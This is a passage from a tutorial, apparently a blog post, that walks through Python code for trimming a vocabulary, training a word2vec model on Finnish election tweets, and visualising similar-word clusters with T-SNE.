Next, I trim the vocabulary and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming, it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distribution, query each of them for the 40 most similar words, and plot both labelled graphs of each set and a “big plot” of that set over the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.